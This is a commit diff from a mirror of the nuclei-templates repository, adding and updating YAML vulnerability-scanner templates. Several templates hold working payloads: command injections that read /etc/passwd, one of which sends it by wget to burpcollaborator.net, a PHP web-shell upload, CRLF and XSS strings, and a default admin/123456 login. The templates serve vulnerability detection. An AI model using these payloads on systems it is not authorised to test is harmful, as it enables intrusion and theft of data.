daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #24 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-03-05 01:58:49 +05:30 committed by GitHub
parent 74e63203b7 93f76d8d4d
commit b349e4aa0c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
27 changed files with 505 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
README.md
View File

@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 218 | vulnerabilities | 104 | exposed-panels | 90 |
| exposures | 55 | technologies | 47 | misconfiguration | 49 |
| workflows | 23 | miscellaneous | 16 | default-logins | 16 |
| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 |
| exposures | 60 | technologies | 50 | misconfiguration | 50 |
| workflows | 23 | miscellaneous | 16 | default-logins | 17 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - |
**68 directories, 653 files**.
**69 directories, 672 files**.
</td>
</tr>

1
cves/2019/CVE-2019-17506.yaml
View File

@ -27,3 +27,4 @@ requests:
- "</password>"
- "DEVICE.ACCOUNT"
part: body
condition: and

17
cves/2019/CVE-2019-5127.yaml
View File

@ -23,12 +23,19 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "uid(.*)"
- "gid(.*)"
part: body
- type: word
words:
- "uid="
- "gid="
- "groups="
condition: and
part: body
- type: word
words:
- text/plain
part: header
- type: status
status:
- 200

4
cves/2019/CVE-2019-7219.yaml
View File

@ -9,14 +9,14 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/webapp/?fccc0\"><script>alert(1)</script>5f43d=1"
- '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"><script>alert(1)</script>"
- "<svg/onload=alert(xss)>"
- type: word
part: header
words:

8
cves/2020/CVE-2020-13937.yaml
View File

@ -11,7 +11,7 @@ info:
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
reference: ttps://nvd.nist.gov/vuln/detail/CVE-2020-13937
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13937
tags: cve,cve2020,apache
# References:
@ -29,13 +29,15 @@ requests:
- type: status
status:
- 200
- type: word
words:
- "application/json"
condition: and
part: header
- type: word
words:
- "config"
- config
- kylin.metadata.url
condition: and
part: body

4
cves/2020/CVE-2020-1943.yaml
View File

@ -9,13 +9,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/control/stream?contentId=<svg/onload=alert(1)>'
- '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(1)>"
- "<svg/onload=alert(xss)>"
part: body
- type: word

26
cves/2020/CVE-2020-21224.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2020-21224
info:
name: Inspur ClusterEngine V4.0 RCE
author: pikpikcu
severity: critical
reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
tags: cve,cve2020,clusterengine,rce
requests:
- method: POST
path:
- '{{BaseURL}}/login.php'
body: "op=login&username=;`cat /etc/passwd`&password="
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200

34
cves/2021/CVE-2021-21315.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2021-21315
info:
name: Node.js Systeminformation Command Injection
author: pikpikcu
severity: high
reference: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
tags: nodejs,cve,cve2021
requests:
- method: GET
path:
- "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)"
matchers-condition: and
matchers:
- type: word
words:
- "application/json"
part: header
- type: word
words:
- "wget --post-file /etc/passwd burpcollaborator.net"
- name
- running
- pids
part: body
condition: and
- type: status
status:
- 200

29
cves/2021/CVE-2021-27132.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2021-27132
info:
name: CRLF Injection - Sercomm VD625
author: geeknik
severity: medium
description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132
tags: cve,cve2021,crlf
requests:
- method: GET
path:
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0"
matchers-condition: and
matchers:
- type: status
status:
- 404
part: header
- type: word
words:
- "Content-Disposition: attachment;filename=test.txt"
- "Set-Cookie:CRLFInjection=Test"
- "Location: example.com"
- "X-XSS-Protection:0"
part: header
condition: and

4
cves/2021/CVE-2021-3129.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-3129
info:
name: Ignition Laravel RCE
name: LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION
author: z3bd
severity: critical
description: Detect Ignition before 2.5.2, as used in Laravel, allows unauthenticated RCE.
description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
reference: https://www.ambionics.io/blog/laravel-debug-rce
tags: cve,cve2021,laravel,rce

27
default-logins/alibaba/alibaba-canal-default-password.yaml Normal file
View File

@ -0,0 +1,27 @@
id: alibaba-canal-default-password
info:
name: Alibaba Canal Default Password
author: pdteam
severity: high
tags: alibaba,dlogin
requests:
- method: POST
path:
- "{{BaseURL}}/api/v1/user/login"
headers:
Content-Type: application/json
body: |
{"username":"admin","password":"123456"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'data":{"token"'
- '"code":20000'
condition: and

2
default-logins/apache/tomcat-manager-default.yaml
View File

@ -44,7 +44,7 @@ requests:
- j5Brn9
- tomcat
attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
raw:
# Request with simple param and header manipulation with DSL functions

23
exposed-panels/acunetix-panel.yaml Normal file
View File

@ -0,0 +1,23 @@
id: acunetix-panel-detect
info:
name: Acunetix Panel detector
author: joanbono
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/#/login"
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers-condition: and
matchers:
- type: word
words:
- '<title>Acunetix</title>'
- '<acx-root></acx-root>'
part: body
- type: status
status:
- 200

18
exposed-panels/checkmarx-panel.yaml Normal file
View File

@ -0,0 +1,18 @@
id: checkmarx-panel-detect
info:
name: Checkmarx WebClient detector
author: joanbono
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/cxwebclient/Login.aspx"
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers:
- type: word
words:
- '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
part: body

18
exposed-panels/hmc-hybris-panel.yaml Normal file
View File

@ -0,0 +1,18 @@
id: hmc-hybris-panel
info:
name: SAP Hybris Management Console
author: dogasantos
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/hmc/hybris"
- "{{BaseURL}}/hybris/hmc/hybris"
matchers:
- type: word
words:
- "hybris Management Console"
part: body

26
exposed-panels/nessus-panel.yaml Normal file
View File

@ -0,0 +1,26 @@
id: nessus-panel-detect
info:
name: Nessus Panel detector
author: joanbono
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/server/status"
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers-condition: and
matchers:
- type: word
words:
- '{"code":200,"progress":null,"status":"ready"}'
part: body
- type: word
words:
- 'NessusWWW'
part: header
- type: status
status:
- 200

25
exposures/configs/exposed-bitkeeper.yaml Normal file
View File

@ -0,0 +1,25 @@
id: exposed-bitkeeper
info:
name: Exposed BitKeeper Directory
author: daffainfo
severity: low
reference: https://www.bitkeeper.org/man/config-etc.html
requests:
- method: GET
path:
- "{{BaseURL}}/BitKeeper/etc/config"
matchers-condition: and
matchers:
- type: word
words:
- "logging"
- "email"
- "description"
condition: and
- type: status
status:
- 200

24
exposures/configs/exposed-bzr.yaml Normal file
View File

@ -0,0 +1,24 @@
id: exposed-bzr
info:
name: Exposed BZR Directory
author: daffainfo
severity: low
reference: http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html
requests:
- method: GET
path:
- "{{BaseURL}}/.bzr/branch/branch.conf"
matchers-condition: and
matchers:
- type: word
words:
- "parent_location"
- "push_location"
condition: and
- type: status
status:
- 200

22
exposures/configs/exposed-darcs.yaml Normal file
View File

@ -0,0 +1,22 @@
id: exposed-darcs
info:
name: Exposed Darcs Config
author: daffainfo
severity: low
reference: http://darcs.net/Using/Configuration#sources
requests:
- method: GET
path:
- "{{BaseURL}}/_darcs/prefs/binaries"
matchers-condition: and
matchers:
- type: word
words:
- "Binary file regexps"
- type: status
status:
- 200

22
exposures/configs/exposed-hg.yaml Normal file
View File

@ -0,0 +1,22 @@
id: exposed-hg
info:
name: Exposed HG Directory
author: daffainfo
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}/.hg/hgrc"
matchers:
- type: word
words:
- "[paths]"
- "default"
condition: and
- type: status
status:
- 200

30
exposures/configs/joomla-config-file.yaml Normal file
View File

@ -0,0 +1,30 @@
id: joomla-config-dist-file
info:
name: Joomla Config Dist File
author: oppsec
severity: low
description: configuration.php-dist is a file created by Joomla to save Joomla settings.
requests:
- method: GET
path:
- "{{BaseURL}}/configuration.php-dist"
matchers-condition: and
matchers:
- type: word
words:
- "Joomla"
- "JConfig"
- "@package"
condition: and
- type: word
words:
- "text/plain"
part: header
- type: status
status:
- 200

6
exposures/configs/phpinfo.yaml
View File

@ -2,7 +2,7 @@ id: phpinfo-files
info:
name: phpinfo Disclosure
author: pd-team
author: pd-team & daffainfo
severity: low
requests:
@ -21,8 +21,10 @@ requests:
- "{{BaseURL}}/time.php"
- "{{BaseURL}}/index.php"
- "{{BaseURL}}/temp.php"
- "{{BaseURL}}/PHPInfo.php"
- "{{BaseURL}}/old_phpinfo.php"
- "{{BaseURL}}/infos.php"
- "{{BaseURL}}/linusadmin-phpinfo.php"
- "{{BaseURL}}/php-info.php"
matchers:
- type: word
words:

26
technologies/burp-api-detect.yaml Normal file
View File

@ -0,0 +1,26 @@
id: burp-rest-api-detect
info:
name: Burp Rest API Server Running
author: joanbono
severity: info
reference: https://portswigger.net/burp/documentation/enterprise/api-reference
requests:
- method: GET
path:
- "{{BaseURL}}/v0.1/"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Burp API</title>'
part: body
- type: word
words:
- 'X-Burp-Version'
part: header
- type: status
status:
- 200

36
technologies/ilo-detect.yaml Normal file
View File

@ -0,0 +1,36 @@
id: ilo-detect
info:
name: HP iLO
author: milo2012
severity: info
description: Version of HP iLO
requests:
- method: GET
path:
- "{{BaseURL}}/xmldata?item=all"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- text/xml
part: header
- type: word
words:
- <RIMP>
- <HSI>
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- "<FWRI>([0-9.]+)</FWRI>"

31
technologies/microsoft-echange-server-detect.yaml Normal file
View File

@ -0,0 +1,31 @@
id: microsoft-echange-server-detect
info:
name: Microsoft Exchange Server Detect
author: pikpikcu
severity: info
reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
description: |
Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
requests:
- method: GET
path:
- "{{BaseURL}}/owa/auth/logon.aspx"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)"
part: all
extractors:
- type: kval
part: header
kval:
- X-Owa-Version

4
vulnerabilities/other/discourse-xss.yaml
View File

@ -10,7 +10,7 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E'
- '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E'
matchers-condition: and
matchers:
- type: status
@ -19,7 +19,7 @@ requests:
- type: word
words:
- "<svg/onload=alert(1337)>"
- "<svg/onload=alert(xss)>"
part: body
- type: word

53
vulnerabilities/other/simple-employee-rce.yaml Normal file
View File

@ -0,0 +1,53 @@
id: simple-employee-rce
info:
name: Simple Employee Records System 1.0 RCE
author: pikpikcu
severity: critical
reference: https://www.exploit-db.com/exploits/49596
tags: rce
requests:
- raw:
- |
POST /dashboard/uploadID.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337
Content-Length: 267
DNT: 1
Connection: close
-----------------------------5825462663702204104870787337
Content-Disposition: form-data; name="employee_ID"; filename="poc.php"
Content-Type: image/png
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
-----------------------------5825462663702204104870787337--
- |
GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 2
extractors:
- type: regex
name: endpoint
part: body
internal: true
regex:
- '(?:[a-zA-Z0-9+\/])*_poc.php'
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
condition: and
part: body